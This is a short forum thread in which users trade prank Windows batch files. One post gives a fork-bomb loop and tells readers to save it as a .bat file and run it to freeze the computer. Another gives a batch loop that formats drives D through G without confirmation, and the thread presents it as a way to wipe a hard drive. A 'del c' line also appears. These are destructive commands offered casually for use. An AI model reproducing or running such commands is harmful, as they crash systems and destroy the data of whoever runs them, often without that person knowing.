Freddy wrote:jimmynewguy wrote: open a text file then type exactally this
:fail
start
goto fail
then save it as a .bat file and open it (make sure to click the all files not just .txt)
Nice. Lol.
jimmynewguy wrote:freezes your computer
Game A Gogo wrote:how about one that erases your c drive?
no :B
@echo off
for %%i in (d:,e:,f:,g:) do format %%i /FS:NTFS /xIf
oh my @,,@
you mean like it distorts an image?
jimmynewguy wrote:Game A Gogo wrote:how about one that erases your c drive?
no :B
actuall maybe
- Code: Select all
@echo off
for %%i in (d:,e:,f:,g:) do format %%i /FS:NTFS /xIf
will format your hard drive
del c
Users browsing this forum: No registered users and 1 guest